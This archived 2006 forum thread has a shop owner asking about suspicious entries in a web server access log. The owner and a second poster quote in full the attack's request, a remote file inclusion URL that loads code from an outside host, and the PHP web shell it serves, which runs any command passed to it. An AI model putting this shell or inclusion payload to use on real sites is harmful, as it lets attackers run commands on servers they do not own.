awisdoms Posted July 2, 2006 Posted July 2, 2006 I have a question - I was going through my raw access log and I saw many varations of this through out my log from - 210.99.208.60 - - [01/Jul/2006:09:26:58 -0400] "GET /index.php?cPath=http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado HTTP/1.0" 200 43425 "-" "LWP::Simple/5.53" - So I copied the http:// part and it gave me this below - so what are they trying to do in doing this give me a virus? <font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br> <b>#</b> CMD PHP : <h1>PHP SHELL</h1><br> <b>#</b></b></font><br> <br> <br> <hr color="#000000" width=80% height=115px> <br> <div align="center"> <table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080"> <tr> <td width="633" height="17"> <pre><font color="gray" font face="Tahoma" size="2"> <? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> </font></pre> </tr> </table> </div> <br> <hr color="#000000" width=80% height=115px> <p align="left"> <br> <b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b> #<a href="mailto:[email protected]">Contact Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b># :D </b> </font>
mwstinson Posted July 2, 2006 Posted July 2, 2006 I dont know. At first I thought that it might be a webcrawler or something but when I loaded the url specified my antivirus went insane. I dont know what it is but I wanted to put this post in to alert people not to try to load the url: http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado ://http://www.ecidade.com.br/images/xp...d=cat%20bugado and that you should scan your drives because that link tried to infect my computer with a trojan. Just a heads up!! I thought this stuff was gonna be easy!! BACK IT UP BEFORE YOU JACK IT UP!!!!
Silverado05 Posted July 2, 2006 Posted July 2, 2006 LoL, I could have told you that. all you have to do is read this line of code. <? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> Search the forum and contributions before posting. If that doesn't work, keep looking, then post. The forum is for seeking help and advice NOT for someone to do your work for you. Try to do something on your on, if you are going to run a shop then learn how it works.
Jan Zonjee Posted July 2, 2006 Posted July 2, 2006 Did you put the xpl directory in /images yourself or did the hackers do that? It seems full of scripts and stuff (hackers stuff? and already for a long time, since April 2005 at least). The server is not set up to not show the listing of the directory when index.html or index.php is missing. This is not good either I think.
awisdoms Posted July 2, 2006 Author Posted July 2, 2006 Yeah I kinda figured it was a script by what it states - but I dont know how they can do such a thing??? They dont have access to my server or my site & no I did not put any images in any thing. Oh great on the code - I have zone alarm and nortons and nothing went off for me but I will check thanks.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.